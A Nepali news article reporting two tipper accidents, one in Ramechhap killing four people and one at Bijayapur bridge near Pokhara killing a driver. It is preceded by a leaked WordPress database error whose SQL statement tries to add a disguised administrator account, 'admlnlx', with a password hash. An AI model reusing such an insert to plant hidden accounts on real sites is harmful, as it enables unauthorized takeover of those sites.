WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6DMbA90.jA.wuuwVw1NAXtoRDSP451', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-16 02:14:52', '', 'admlnlx', 'admlnlx')
रामेछाप, मंसिर २९–
रामेछापको खाँडादेवी गाविसमा ट्रिपर दुर्घटना हुँदा चार जनाको मृत्यु भएको छ । बा २ ख ६८८८ नम्बरको ट्रिपर लिसेपाटी र चोप्राङको बीच डाँडामा दुर्घटना हुँदा तीन जनाको घटनास्थलमै र एक जनाको उपचारका लागि सदरमुकाम मन्थली ल्याउँदै गर्दा बाटोमै ज्यान गएको हो ।
खाँडादेवी गाविसको चोप्राङमा मंगलबार साँझ पकरवास–गाल्पा सडकमा ग्राबेलिङको काम गरेर पात्लेमा रहेको क्याम्पमा जाने क्रममा ट्रिपर दुर्घटना भएको प्रहरीले जनाएको छ ।
दुर्घटनामा ज्यान गुमाउनेहरुमा सिन्धुपाल्चोक घर भएका वर्ष ३० का ट्रिपर चालक कुमार बिक, सिन्धुली भिमान घर भएका २३ वर्षका रुपेश भण्डारी, सर्लाही घर भएका २२ वर्षका बिकास पौडेल र ललितपुर चापागाउँ घर भएका वर्ष ३५ किरण डाँगी रहेको जिल्ला प्रहरी कार्यालय रामेछापका प्रवक्ता प्रेम जोसीले जानकारी दिनुभयो ।
यसैबीच पोखराबाट लेखनाथतर्फ जाँदै गरेको ग १ ख ३७१८ नम्बरको ट्रिपर पोखरा र लेखनाथ जोड्ने बिजयपुर पुलबाट खोलामा खस्दा ट्रिपर चालक तनहुँ शुक्लागण्डकी नगरपालिका वडा नम्बर १ का २७ वर्षीय टुकबहादुर क्षेत्रीको मृत्यु भएको छ ।